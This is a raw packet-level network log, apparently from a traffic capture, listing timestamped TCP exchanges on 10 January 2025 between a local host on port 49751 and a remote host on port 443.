                                                                                                Jan 10, 2025 07:52:10.066004992 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.066052914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.066061020 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.066077948 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.066104889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.095531940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.095599890 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.095653057 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.095660925 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.095801115 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.095801115 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.110224962 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.110285997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.524878025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.524889946 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.524926901 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.555133104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.555166006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.555239916 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.555241108 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.555249929 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.555337906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.563153982 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.563175917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.563221931 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.563229084 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.563262939 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.563298941 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.574335098 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.574383020 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.574454069 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.574454069 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.574461937 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.574565887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.596100092 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.596149921 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.596184969 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.596194029 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.596227884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.596227884 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.596771002 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.596813917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.596842051 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.596848965 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.597352028 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.597352028 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.605139971 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.605185986 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.605258942 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.605266094 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.605282068 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.608006954 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.610678911 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.610726118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.610810041 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.610810041 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.610816956 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.610872030 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.617307901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.617350101 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.617402077 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.617409945 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.617470026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.617470026 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.647994995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.648041010 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.648061991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.648097992 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.648107052 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.648158073 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.655558109 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.655601025 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.655618906 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.655627966 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.655662060 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.655695915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.666835070 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.666878939 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.666966915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.666966915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.666974068 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.667332888 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.688462973 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.688508987 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.688663960 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.688663960 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.688672066 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.688735962 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.689260006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.689306021 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.690052032 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.690052032 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.690059900 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.690685034 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.697559118 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.697606087 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.697674990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.697674990 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.697683096 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.698534966 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.703227997 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.703270912 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.703324080 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.703331947 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.703347921 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.703371048 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.709757090 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.709804058 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.709851027 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.709857941 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.709889889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.710685015 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.740431070 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.740464926 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.740561008 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.740561008 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.740569115 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.742214918 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.748167992 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.748239040 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.748302937 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.748310089 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.748342991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.748342991 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.759330988 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.759383917 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.759434938 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.759443045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.759471893 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.761781931 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781032085 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781076908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781208992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781208992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781217098 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781682014 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781836033 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781879902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781908989 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781914949 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.781949997 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.781949997 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.789973974 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.790023088 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.790071964 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.790081024 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.790163994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.790163994 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.795855999 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.795932055 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.795960903 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.795969009 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.796017885 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.796017885 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.802297115 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.802359104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.802470922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.802470922 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.802478075 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.803335905 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.833223104 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.833286047 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.833344936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.833359957 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.833894968 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.833894968 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.840646982 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.840706110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.841355085 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.841355085 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.841372013 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.842406034 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.851775885 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.851838112 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.851874113 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.851882935 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.851918936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.851919889 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.873632908 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.873694897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.873765945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.873765945 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.873779058 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:10.874191046 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:10.874403954 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.314196110 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.314218998 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.314240932 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.335962057 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.336009979 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.336046934 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.336057901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.336091042 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.336107016 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.339884043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.339931965 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.339956045 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.339962959 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.339987993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.340008974 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.345259905 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.345304012 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.345333099 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.345340014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.345372915 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.345387936 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.350723982 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.350766897 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.350790024 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.350800037 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.350822926 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.350836992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.357053995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.357095003 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.357127905 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.357137918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.357152939 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.357198954 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.388163090 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.388238907 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.388269901 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.388278008 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.388319969 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.388319969 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.395443916 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.395490885 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.395517111 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.395528078 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.395559072 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.395639896 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.406512022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.406534910 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.406588078 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.406604052 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.406630993 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.406646967 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.428297043 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.428338051 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.428384066 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.428396940 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.428417921 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.428442955 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.432391882 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.432423115 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.432460070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.432466984 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.432511091 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.432521105 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.437752962 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.437782049 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.437834978 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.437841892 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.437872887 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.437892914 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.443236113 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.443269014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.443329096 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.443344116 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.443357944 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.443591118 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.449589014 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.449611902 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.449717045 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.449724913 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.449773073 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.480412006 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.480446100 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.480504036 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.480514050 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.480539083 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.480552912 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.488008022 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.488025904 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.488075018 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.488082886 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.488107920 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.488131046 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.498981953 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.499036074 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.499058008 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.499066114 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.499097109 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.499109983 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.520924091 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.520973921 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.521007061 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.521024942 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.521040916 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.521084070 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.524801970 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.524848938 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.524878025 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.524884939 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.524910927 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.524929047 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.530297995 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.530364990 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.530385017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.530395031 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.530425072 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.530445099 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.535727978 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.535778046 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.535804987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.535811901 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.535839081 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.535857916 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.541955948 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.541999102 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.542042017 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.542047977 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.542082071 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.542093992 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.572874069 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.572921038 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.572976112 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.572984934 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.573013067 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.573025942 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.580604076 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.580651045 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.580682039 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.580688953 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.580713987 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.580724001 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.591687918 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.591707945 CET4434975147.79.66.76192.168.2.9
                                                                                                Jan 10, 2025 07:52:11.591825962 CET49751443192.168.2.947.79.66.76
                                                                                                Jan 10, 2025 07:52:11.591836929 CET4434975147.79.66.76192.168.2.9
